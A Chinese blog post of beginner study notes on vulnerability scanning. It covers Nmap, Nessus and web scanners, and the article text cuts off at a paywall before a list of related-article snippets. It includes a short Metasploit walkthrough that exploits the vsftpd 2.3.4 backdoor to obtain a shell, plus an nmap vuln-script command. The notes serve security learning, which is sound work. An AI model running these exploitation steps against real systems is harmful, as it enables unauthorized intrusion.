漏洞扫描学习笔记(一)

最新推荐文章于 2025-09-19 10:44:21 发布
原创 最新推荐文章于 2025-09-19 10:44:21 发布 · 1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #windows xp #操作系统 #安全漏洞

本文介绍了漏洞扫描的基本原理,通过发送验证数据到目标服务,根据响应判断是否存在漏洞。提到了Nmap和Nessus等扫描工具,以及Metasploit用于漏洞利用。在Web应用程序漏洞扫描部分,列举了Owasp-ZAP、AWVS等常见扫描器,并以Sqlmap为例展示了如何利用SQL注入漏洞。

漏洞扫描原理

漏洞扫描器对漏洞进行扫描,以验证具体目标是否存在对应的具体漏洞。但是也存在错误扫描,需要对扫描结果进行漏洞验证。

其实扫描器的原理大致相同都是通过发送对应的验证数据到目标具体服务进行验证。当收到目标返回的响应与存在漏洞的响应一致时,就表明存在漏洞。

漏洞扫描工具

Nmap

nmap --script vuln 目标IP地址

Nessus 系统漏洞扫描

**Metasploit **对扫描到的漏洞加以利用

以vsftpd2.3.4为例

search vsftpd

得到

use (复制粘贴上面的路径)

show payloads

set payload cmd/unix/interact //上面展示的路径

show options 设置所用的参数

set rhost(上面name下面的) ip

show options 观察是否设置成功

exploit 溢出

得到shell

web应用程序漏洞扫描

针对web应用程序的漏洞扫描其实就是每个扫描器读取自己的payload进行探测

常见Web漏洞扫描器:

1.Owasp-zap

2.awvs

3.appscan

4.nikto

5.Burpsuite

每个扫描器都有各自不同的payload探测

Woasp-zap

最低0.47元/天 解锁文章
Nmap端口扫描+Nmap脚本扫描漏洞(学习笔记
Sumarua的博客
07-26 1万+
文章目录Nmap端口扫描+Nmap脚本扫描漏洞(学习笔记、Nmap端口扫描二、Nmap脚本加载扫描 Nmap端口扫描+Nmap脚本扫描漏洞(学习笔记) Nmap具体功能:端口扫描,协议扫描,漏洞扫描,绕过防护,漏洞利用等。 、Nmap端口扫描 端口状态: 1、Open:端口开启,有程序监听此端口 2、Closed:端口关闭,数据能到达主机,但是没有程序监听此端口 3、Filtered:数据未能到达主机 4、Unfiltered:数据能到达主机,但是Nmap无法判断端口开启还是关闭 5、Open | f
Web安全漏洞个人学习笔记
stillaway的博客
01-09 1495
Web安全学习笔记
漏洞扫描的简单总结概述理解
04-10
自己的些总结 nginx mysql 还有漏洞扫描的解析,整理
漏洞扫描基础知识
S_0611的博客
04-26 2299
文章目录 、CTF 基础知识 —CTF简介 竞赛模式 比赛形式 题目类型 二、web 信息泄露 目录遍历 PHPINFO 备份文件下载 网站源码 bak文件 vim缓存 DS_Store 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录文章目录、CTF基础知识1、CTF简介2、竞赛模式3、比赛形式4、题目类型二、Web(信息泄露)目录遍历PHPINFO2.读入数据总结 、CTF基础知识 1、CTF简介 开启题目 找到flag复制 提交 2、竞赛模式 开启题目 找到fla
Web安全神器:OWASP ZAP入门实战指南(渗透测试/漏洞扫描
最新发布
安全渗透Hacker的博客
09-19 1383
本文将带你从零开始,全面了解ZAP的核心功能,并通过次完整的实战演练,教你如何用它发现网站安全漏洞。ZAP 的 HUD (Heads-Up Display)个独特的交互式界面,集成在浏览器中,直接在目标网页上覆盖层动态工具栏,无需频繁切换 ZAP 主界面即可完成常见操作,显著提升渗透测试效率。点击任意个警报(如个XSS漏洞),下方会显示详细的漏洞描述、攻击载荷、请求和响应信息,以及修复建议。OWASP ZAP是款极其强大的工具,将它融入你的开发和安全流程中,能极大地提升应用的安全性。
第八章()—漏洞扫描(基本概念)
weixin_43876557的博客
06-01 2398
基于端口服务扫描结果版本信息(速度慢) 搜索已公开的漏洞数据库(数量大) 使用弱点扫描器实现漏洞管理
kali linux渗透测试之漏洞扫描
热门推荐
qq_57223070的博客
09-26 2万+
skipfish、nessus、AWVS、nikto的简单使用及功能倾向介绍。
【网络安全学习】漏洞扫描:- 02- nmap漏洞扫描
Zane的博客
06-19 909
漏洞扫描:使用nmap进行漏洞扫描
Vulnerability_Scanner:利用机器学习技术的C ++漏洞扫描程序
04-08
漏洞扫描器 概述 软件漏洞是当前软件开发中的关键问题之。 这些漏洞可能构成严重的利用风险,并导致系统受损,信息泄漏甚至进步的财务损失。 不幸的是,测试和手动代码审查不能总是找到每个漏洞。 为了解决该...
用于黑客渗透测试的 21 个最佳 Kali Linux 工具
weixin_34179968的博客
05-16 955
这里是最好的 Kali Linux 工具列表,它们可以让你评估 Web 服务器的安全性,并帮助你执行黑客渗透测试。 如果你读过 Kali Linux 点评,你就知道为什么它被认为是最好的黑客渗透测试的 Linux 发行版之,而且名副其实。它带有许多工具,使你可以更轻松地测试、破解以及进行数字取证相关的任何其他工作。 它是道德黑客ethical hacker最推荐的 Linux 发行版之。...
weblogic cmd命令漏洞检测
04-08
对weblogic中cmd反序列号漏洞检测,必须要求是java8的环境启动,也可以选择对jboos的漏洞,对安全测评来说,比较重要,可以复现漏洞
漏洞扫描学习笔记
weixin_52034407的博客
03-21 453
漏洞扫描学习笔记
《Web漏洞防护》读书笔记——第9章,XSS防护
jexsen的博客
04-09 407
《Web漏洞防护》读书笔记——第7章,XSS防护 XSS 跨站脚本攻击,注入型攻击,攻击者使用Web应用将恶意代码发送给不同终端用户,造成恶意代码在用户端的执行。由于用户的浏览器无法判断脚本是否应该被新人,人为脚本来自可信的源,直接执行脚本。 核心:Web应用直接将用户的输入作为输出,且对输出未进行任何的编码和验证。 极易出现XSS的地方 1.搜索域:直接将用户的搜索内容不加处理的返回给用户。 2.输入域:直接将用户输入的内容不加处理的返回给用户。 3.错误信息:直接将用户提供的内容不加处理的防止在错误消
KALI之漏洞扫描
hacker681的博客
01-14 6909
漏洞扫描 发现漏洞 端口开放的跑的是什么服务这些端口上的服务使用的软件的版本等等的信息有了这些信息的时候可以到官方网站去比较下最新的版本是什么版本两个比对下你会发现有补丁列表官方修复了什么漏洞如果高危漏洞的话就可以直接控制目标系统。所以通过之前掌握的信息呢可以以此为基础对目标系统存了什么漏洞弱点来判断,这样做有很大的弊端就是扫了很多端口每个端口跑了很多服务 要忙于在大网站上面去查询官方的文档阅...
漏洞扫描有哪些特征?
Adelineyoung8的博客
04-10 495
自动化扫描可以快速、高效地检测出系统中的漏洞,并且可以针对不同的系统和应用进行定制化的扫描,提高检测的准确性和。漏洞扫描需要由专业的安全人员操作,这些人员通常具备丰富的安全知识和技能,能够熟练地使用各种漏洞扫描工具和攻击手段,对目标系统进行深入的检测和分析。这使得漏洞扫描成为种安全、可靠的检测手段。漏洞扫描的核心是模拟攻击行为,通过模拟黑客攻击的手段和行为,对目标系统进行深入的漏洞扫描和攻击模拟。漏洞扫描通常会检测已知的漏洞和攻击手段,这些已知的漏洞和攻击手段被记录在各种漏洞数据库和黑客工具中。
【Kali Linux】渗透测试——漏洞扫描
程序员若风的博客
11-07 2605
为了帮助大家更好的学习网络安全,我给大家准备了份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~《网络安全入门+进阶学习资源包》优快云大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享网络安全源码合集+工具包视频教程。
漏洞扫描器 - cmd命令行执行
ASDF的博客
06-05 1215
漏洞扫描器 - cmd命令行执行
JAVA漏洞复现技术学习笔记
2. 漏洞识别:通过漏洞扫描工具或者人工识别的方式,找出应用程序中的潜在漏洞。 3. 漏洞复现:下载或编写漏洞利用代码,模拟攻击者利用漏洞进行攻击,观察结果。 4. 漏洞分析:对复现的漏洞进行深入分析,了解其...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值